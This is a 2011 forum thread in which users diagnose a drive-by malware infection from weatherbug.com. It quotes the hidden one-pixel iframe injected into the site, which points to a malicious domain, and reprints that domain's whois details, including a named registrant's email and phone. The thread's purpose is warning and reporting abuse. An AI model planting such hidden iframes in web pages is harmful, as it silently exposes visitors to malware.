Weatherbug.com Malware!

mketsdev1
Posts: 3
Joined: Mon Feb 14, 2011 4:36 am

Weatherbug.com Malware!

Post by mketsdev1 » Mon Feb 14, 2011 4:36 am

Yesterday I went in to Weatherbug.com, which I have been doing for years. I noticed a funny Java download rectangle on the screen, and then my computer started beeping as my Symantec began blocking something malicious. There were hundreds of repeat blockage messages. Then my whole desktop was taken over by a bogus "virus" scan, which froze up my whole system. I couldn't close the malware or open anything else. I shut down my system and had my son-in-law, who is an IT person, come over and it took him about 20 minutes to get rid of whatever it was......so Weatherbug has a bug! Anybody else having this problem?

User avatar
Figure10
Posts: 139
Joined: Sun Jun 20, 2010 9:46 pm

RE: Weatherbug.com Malware!

Post by Figure10 » Mon Feb 14, 2011 5:18 am

Whatever it is, URLVoid doesn't know about it.
I ❤ WOT

User avatar
c۞g
Posts: 10927
Joined: Mon Jan 05, 2009 4:02 am

RE: Weatherbug.com Malware!

Post by c۞g » Mon Feb 14, 2011 5:54 am

weatherbug.com has been compromised

There is an iFrame:located in the source, from a direct visit.

<iframe src="http://x4fw.co.cc/index.php?tp=433c5e3637bbd0e1" style="visibility: hidden;" height="1" width="1">
</iframe>


That site when visited directly redirects to google.com
with the full URL: hxxp://x4fw.co.cc/index.php?tp=433c5e3637bbd0e1
it loads a page requiring that Java be installed - I get "missing plug-in" warning since I keep Java disabled *always*

If you use weatherbug, you have facility to contact their support.
Inform them their site has been compromised.and request they remove the hidden iFrame

Whois information for: x4fw.co.cc
via: http://www.co.cc/whois/whois.php

Registrar : CO.CC, INC.
Whois Server : co.cc
Referral URL : http://www.co.cc
Service Type : ZONE RECORD

Updated Date : 10-Feb-2011
Creation Date : 10-Feb-2011
Expiration Date : 10-Feb-2012

Registrant

Evgeniy Smirnov
Moscow, Moscow
RUSSIAN FEDERATION
Email : evgeny.smirnov@mail.ru
Phone : +74952583212

Updated Date : 09-Feb-2011
Creation Date : 09-Feb-2011


Thanks for the alert.

I submitted an abuse report to CO.CC to pull the domain
http://www.co.cc/prosecution/prosecution.php
I suggest others do the same

Rated
Malicious content:
x4fw.co.cc

[edit]

her's a source chart image for:

∞ Opto, ergo sum
_https://en.wikipedia.org/wiki/And_You_and_I


User avatar
Satchman
Posts: 691
Joined: Mon Dec 28, 2009 1:08 pm

RE: Weatherbug.com Malware!

Post by Satchman » Tue Feb 15, 2011 4:00 am

Checking the box for a recent re-scan of the website by www.urlvoid.com shows that this site has been infected.

Report 2011-02-15 04:17:03 (GMT 1)
File Name weatherbug-com
File Size 49276 bytes
File Type Unknown file
MD5 Hash a310f04fb9c28f16b3b7e2eb39142eff
SHA1 Hash 40d348387481cfb4f7ffe5a89559ee7c36c6c62d
Detections: 1 / 16 (6 %)
Status INFECTED

Antivirus Updated Engine Result
a-squared 15/02/2011 5.0.0.20 -
Avast 15/02/2011 5.0 -
AVG 15/02/2011 9.0.0.725 -
Avira AntiVir 15/02/2011 7.6.0.59 -
BitDefender 15/02/2011 7.0.0.2555 -
ClamAV 15/02/2011 0.96.2.1 -
Comodo 15/02/2011 4.0 -
Dr.Web 15/02/2011 5.00.0 -
F-PROT6 15/02/2011 4.6.1.107 -
Ikarus T3 15/02/2011 1001084 -
Kaspersky 15/02/2011 9.0.0.736 -
NOD32 15/02/2011 4.2.42.0 -
Panda 15/02/2011 10.0.3.0 -
TrendMicro 15/02/2011 9.120-1004 -
VBA32 15/02/2011 3.12.14.1 Malware.HTML.Iframe
VirusBuster 15/02/2011 1.5.6

Satch

WeatherBug1
Posts: 1
Joined: Tue Feb 15, 2011 2:44 pm

RE: Weatherbug.com Malware!

Post by WeatherBug1 » Tue Feb 15, 2011 2:44 pm

I represent WeatherBug. We have looked into this issue and could not find any offending code. Any issue was likely caused by an ad served through a third party ad network. We will be monitoring our ads to avoid any future occurrences.

mketsdev1
Posts: 3
Joined: Mon Feb 14, 2011 4:36 am

RE: Weatherbug.com Malware!

Post by mketsdev1 » Sat Feb 19, 2011 3:28 pm

Thank you! I miss being able to check my local weather stations!

Guest

RE: Weatherbug.com Malware!

Post by Guest » Sat Feb 19, 2011 4:28 pm

Gave up on WeatherBug long time back.
Been dangerous for years to use.
List of reasons a mile long.

Have some fun and Google
http://www.google.com/search?q=weatherbug+spyware&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a

http://www.google.com/search?q=weatherbug+issues&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a

http://www.google.com/search?q=weatherbug+malware&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a

User avatar
siblingshot
Posts: 443
Joined: Fri Jan 21, 2011 7:22 pm

RE: Weatherbug.com Malware!

Post by siblingshot » Sat Feb 19, 2011 4:50 pm

Interesting, DT.

I use WeatherBug and noticed - from g7w's post - that it had been compromised. In light of that, and your own pointers, it may be high time to drop a little rain on this addon. Rinse my hands. Wash it away.

The nomencluture itself is a little ironic.

User avatar
Satchman
Posts: 691
Joined: Mon Dec 28, 2009 1:08 pm

RE: Weatherbug.com Malware!

Post by Satchman » Sat Feb 19, 2011 5:59 pm

I remember a history of malware from Weatherbug that goes back at least five years, maybe more. It comes and goes and the site is too much of a risk. They used to put toolbars in people's browsers that AV and scanners would diagnose as malware. There's so much better weather information and sites out there than Weatherbug. I love Yahoo Weather! Nothing to install or download and it is very detailed and accurate.

Satch

Guest

RE: Weatherbug.com Malware!

Post by Guest » Sat Feb 19, 2011 6:20 pm

I just prefer to look at metar reports, and easiest way is download this: http://www.nirsoft.net/utils/mweather.html
The other method is to step outside. ~smiles~

Post Reply

Who is online

Users browsing this forum: Google [Bot] and 2 guests